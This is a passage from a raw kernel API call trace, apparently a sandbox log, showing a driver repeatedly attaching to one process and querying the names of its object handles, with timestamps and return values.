ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.118] PsAcquireProcessExitSynchronization () returned 0x0 [0290.118] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.118] ObReferenceObjectByHandle (in: Handle=0xbc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0f4600, HandleInformation=0x0) returned 0x0 [0290.118] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.118] PsReleaseProcessExitSynchronization () returned 0x2 [0290.118] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58090 [0290.118] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.118] ObfDereferenceObject (Object=0xffffe0006a0f4600) returned 0x7ffd [0290.118] IoCompleteRequest () returned 0x0 [0290.119] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.119] PsAcquireProcessExitSynchronization () returned 0x0 [0290.119] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.144] ObReferenceObjectByHandle (in: Handle=0x160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a137c20, HandleInformation=0x0) returned 0x0 [0290.144] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.144] PsReleaseProcessExitSynchronization () returned 0x2 [0290.144] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5808f [0290.144] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.144] ObfDereferenceObject (Object=0xffffe0006a137c20) returned 0x7fe3 [0290.144] IoCompleteRequest () returned 0x0 [0290.144] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.144] PsAcquireProcessExitSynchronization () returned 0x0 [0290.144] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.145] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a131f20, HandleInformation=0x0) returned 0x0 [0290.145] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.145] PsReleaseProcessExitSynchronization () returned 0x2 [0290.145] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5808e [0290.145] ObQueryNameString (in: Object=0xffffe0006a131f20, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.145] ObfDereferenceObject (Object=0xffffe0006a131f20) returned 0x7ffe [0290.145] IoCompleteRequest () returned 0x0 [0290.145] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.145] PsAcquireProcessExitSynchronization () returned 0x0 [0290.145] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.145] ObReferenceObjectByHandle (in: Handle=0x3b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a275990, HandleInformation=0x0) returned 0x0 [0290.145] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.145] PsReleaseProcessExitSynchronization () returned 0x2 [0290.145] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5808d [0290.145] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.145] ObfDereferenceObject (Object=0xffffe0006a275990) returned 0x800d [0290.145] IoCompleteRequest () returned 0x0 [0290.180] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.180] PsAcquireProcessExitSynchronization () returned 0x0 [0290.180] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.180] ObReferenceObjectByHandle (in: Handle=0x3bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a274090, HandleInformation=0x0) returned 0x0 [0290.180] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.180] PsReleaseProcessExitSynchronization () returned 0x2 [0290.180] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5808c [0290.180] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.180] ObfDereferenceObject (Object=0xffffe0006a274090) returned 0x800d [0290.180] IoCompleteRequest () returned 0x0 [0290.180] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.180] PsAcquireProcessExitSynchronization () returned 0x0 [0290.180] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.180] ObReferenceObjectByHandle (in: Handle=0x3c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a272a20, HandleInformation=0x0) returned 0x0 [0290.180] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.180] PsReleaseProcessExitSynchronization () returned 0x2 [0290.180] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5808b [0290.180] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.180] ObfDereferenceObject (Object=0xffffe0006a272a20) returned 0x800d [0290.180] IoCompleteRequest () returned 0x0 [0290.180] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.180] PsAcquireProcessExitSynchronization () returned 0x0 [0290.180] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.181] ObReferenceObjectByHandle (in: Handle=0x3f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a11cac0, HandleInformation=0x0) returned 0x0 [0290.181] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.181] PsReleaseProcessExitSynchronization () returned 0x2 [0290.181] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5808a [0290.181] ObQueryNameString (in: Object=0xffffe0006a11cac0, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.181] ObfDereferenceObject (Object=0xffffe0006a11cac0) returned 0x7fba [0290.181] IoCompleteRequest () returned 0x0 [0290.181] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.181] PsAcquireProcessExitSynchronization () returned 0x0 [0290.181] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.181] ObReferenceObjectByHandle (in: Handle=0x464, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a12f290, HandleInformation=0x0) returned 0x0 [0290.181] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.181] PsReleaseProcessExitSynchronization () returned 0x2 [0290.181] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58089 [0290.181] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.181] ObfDereferenceObject (Object=0xffffe0006a12f290) returned 0x800e [0290.181] IoCompleteRequest () returned 0x0 [0290.181] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.181] PsAcquireProcessExitSynchronization () returned 0x0 [0290.181] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.181] ObReferenceObjectByHandle (in: Handle=0x5e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007ddf3f20, HandleInformation=0x0) returned 0x0 [0290.181] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.181] PsReleaseProcessExitSynchronization () returned 0x2 [0290.181] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58088 [0290.181] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.181] ObfDereferenceObject (Object=0xffffe0007ddf3f20) returned 0x800d [0290.181] IoCompleteRequest () returned 0x0 [0290.181] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.182] PsAcquireProcessExitSynchronization () returned 0x0 [0290.182] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.182] ObReferenceObjectByHandle (in: Handle=0x7d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f94600, HandleInformation=0x0) returned 0x0 [0290.182] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.182] PsReleaseProcessExitSynchronization () returned 0x2 [0290.182] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58087 [0290.182] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.182] ObfDereferenceObject (Object=0xffffe00069f94600) returned 0x800d [0290.182] IoCompleteRequest () returned 0x0 [0290.182] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.182] PsAcquireProcessExitSynchronization () returned 0x0 [0290.182] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.182] ObReferenceObjectByHandle (in: Handle=0x7e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a263ca0, HandleInformation=0x0) returned 0x0 [0290.182] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.182] PsReleaseProcessExitSynchronization () returned 0x2 [0290.182] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58086 [0290.182] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.182] ObfDereferenceObject (Object=0xffffe0006a263ca0) returned 0x800d [0290.182] IoCompleteRequest () returned 0x0 [0290.182] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.182] PsAcquireProcessExitSynchronization () returned 0x0 [0290.182] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.182] ObReferenceObjectByHandle (in: Handle=0x7e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f948e0, HandleInformation=0x0) returned 0x0 [0290.182] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.182] PsReleaseProcessExitSynchronization () returned 0x2 [0290.182] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58085 [0290.182] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.182] ObfDereferenceObject (Object=0xffffe00069f948e0) returned 0x800d [0290.182] IoCompleteRequest () returned 0x0 [0290.183] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.183] PsAcquireProcessExitSynchronization () returned 0x0 [0290.183] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.183] ObReferenceObjectByHandle (in: Handle=0x82c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fa4aa0, HandleInformation=0x0) returned 0x0 [0290.183] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.183] PsReleaseProcessExitSynchronization () returned 0x2 [0290.183] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58084 [0290.183] ObQueryNameString (in: Object=0xffffe00069fa4aa0, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.183] ObfDereferenceObject (Object=0xffffe00069fa4aa0) returned 0x7ffe [0290.183] IoCompleteRequest () returned 0x0 [0290.183] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.183] PsAcquireProcessExitSynchronization () returned 0x0 [0290.183] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.183] ObReferenceObjectByHandle (in: Handle=0x838, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fa5b90, HandleInformation=0x0) returned 0x0 [0290.183] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.183] PsReleaseProcessExitSynchronization () returned 0x2 [0290.183] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58083 [0290.183] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.183] ObfDereferenceObject (Object=0xffffe00069fa5b90) returned 0x800d [0290.186] IoCompleteRequest () returned 0x0 [0290.186] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.186] PsAcquireProcessExitSynchronization () returned 0x0 [0290.186] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.273] ObReferenceObjectByHandle (in: Handle=0x840, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a696801, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fa56a0, HandleInformation=0x0) returned 0x0 [0290.273] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.274] PsReleaseProcessExitSynchronization () returned 0x2 [0290.274] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58082 [0290.274] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.274] ObfDereferenceObject (Object=0xffffe00069fa56a0) returned 0x800d [0290.274] IoCompleteRequest () returned 0x0 [0290.274] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.274] PsAcquireProcessExitSynchronization () returned 0x0 [0290.274] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.293] ObReferenceObjectByHandle (in: Handle=0x8c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a2c5101, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a126a40, HandleInformation=0x0) returned 0x0 [0290.293] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.293] PsReleaseProcessExitSynchronization () returned 0x2 [0290.293] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58081 [0290.294] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.294] ObfDereferenceObject (Object=0xffffe0006a126a40) returned 0x800d [0290.294] IoCompleteRequest () returned 0x0 [0290.294] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.294] PsAcquireProcessExitSynchronization () returned 0x0 [0290.294] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.345] ObReferenceObjectByHandle (in: Handle=0x8c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a2c5101, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b7a7d0, HandleInformation=0x0) returned 0x0 [0290.345] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.345] PsReleaseProcessExitSynchronization () returned 0x2 [0290.345] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58080 [0290.345] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.345] ObfDereferenceObject (Object=0xffffe00069b7a7d0) returned 0x7fff [0290.345] IoCompleteRequest () returned 0x0 [0290.345] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.345] PsAcquireProcessExitSynchronization () returned 0x0 [0290.345] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.366] ObReferenceObjectByHandle (in: Handle=0x8d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a2ca101, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2d3750, HandleInformation=0x0) returned 0x0 [0290.366] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.366] PsReleaseProcessExitSynchronization () returned 0x2 [0290.366] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5807f [0290.366] ObQueryNameString (in: Object=0xffffe0006a2d3750, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.366] ObfDereferenceObject (Object=0xffffe0006a2d3750) returned 0x7fff [0290.366] IoCompleteRequest () returned 0x0 [0290.366] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.366] PsAcquireProcessExitSynchronization () returned 0x0 [0290.366] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.385] ObReferenceObjectByHandle (in: Handle=0x8dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a3e5901, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0ef560, HandleInformation=0x0) returned 0x0 [0290.385] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.385] PsReleaseProcessExitSynchronization () returned 0x2 [0290.385] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5807e [0290.385] ObQueryNameString (in: Object=0xffffe0006a0ef560, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.385] ObfDereferenceObject (Object=0xffffe0006a0ef560) returned 0x7fff [0290.385] IoCompleteRequest () returned 0x0 [0290.385] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.385] PsAcquireProcessExitSynchronization () returned 0x0 [0290.385] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.609] ObReferenceObjectByHandle (in: Handle=0x95c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00069b09101, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a277310, HandleInformation=0x0) returned 0x0 [0290.609] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.609] PsReleaseProcessExitSynchronization () returned 0x2 [0290.609] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5807d [0290.609] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.609] ObfDereferenceObject (Object=0xffffe0006a277310) returned 0x800d [0290.609] IoCompleteRequest () returned 0x0 [0290.609] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.609] PsAcquireProcessExitSynchronization () returned 0x0 [0290.609] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.611] ObReferenceObjectByHandle (in: Handle=0x964, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a2c5101, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a278f20, HandleInformation=0x0) returned 0x0 [0290.611] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.611] PsReleaseProcessExitSynchronization () returned 0x2 [0290.611] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5807c [0290.611] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.611] ObfDereferenceObject (Object=0xffffe0006a278f20) returned 0x7ffc [0290.611] IoCompleteRequest () returned 0x0 [0290.611] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.611] PsAcquireProcessExitSynchronization () returned 0x0 [0290.611] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.619] ObReferenceObjectByHandle (in: Handle=0x974, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00069440901, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a143ad0, HandleInformation=0x0) returned 0x0 [0290.619] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.619] PsReleaseProcessExitSynchronization () returned 0x2 [0290.619] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5807b [0290.619] ObQueryNameString (in: Object=0xffffe0006a143ad0, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.619] ObfDereferenceObject (Object=0xffffe0006a143ad0) returned 0x7ffe [0290.619] IoCompleteRequest () returned 0x0 [0290.619] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.619] PsAcquireProcessExitSynchronization () returned 0x0 [0290.619] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.646] ObReferenceObjectByHandle (in: Handle=0xb00, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe0006a4cf901, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2b8dd0, HandleInformation=0x0) returned 0x0 [0290.646] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.646] PsReleaseProcessExitSynchronization () returned 0x2 [0290.646] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x5807a [0290.646] ObQueryNameString (in: Object=0xffffe0006a2b8dd0, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, 